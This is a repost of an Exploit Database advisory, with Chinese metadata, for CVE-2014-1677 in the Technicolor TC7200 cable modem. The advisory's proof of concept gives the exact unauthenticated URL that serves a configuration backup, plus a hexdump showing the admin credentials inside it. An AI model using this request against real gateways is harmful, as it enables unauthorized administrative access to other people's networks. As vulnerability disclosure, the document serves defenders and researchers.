Technicolor TC7200 – Credentials Disclosure

• Exploit Database
• 34 阅读

• 作者： Jeroen - IT Nerdbox
  日期： 2014-02-25
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/31894/

• # Exploit Title: Technicolor TC7200: Authentication Bypass
  # Google Dork: N/A
  # Date: 24-02-2014
  # Exploit Author: Jeroen - IT Nerdbox
  # Vendor Homepage: http://www.technicolor.com/
  # Software Link: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
  # Version: STD6.01.12
  # Tested on: N/A
  # CVE : CVE-2014-1677
  #
  
  ## Description:
  #
  # Any user on the internal network can download a backup configuration file without authenticating first. The backup file contains
  # the credentials to the administrative web interface.
  #
  ## PoC:
  #
  # Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin
  # 
  # Using the command: $ hexedit -C GatewaySettings.bin
  #
  # 0000659000 00 00 00 00 00 00 0030 4d 4c 6f 67 00 06 00 |........0MLog...|
  # 000065a005 61 64 6d 69 6e 00 156d 79 73 75 70 65 72 73 |.admin..mysupers|
  # 000065b065 63 72 65 74 70 61 7373 77 6f 72 64 00 06 75 |ecretpassword..u|
  # 000065c070 63 63 73 72 00 00 |pccsr..|
  # 000065c7
  #
  # 
  
  # More information can be found at:http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/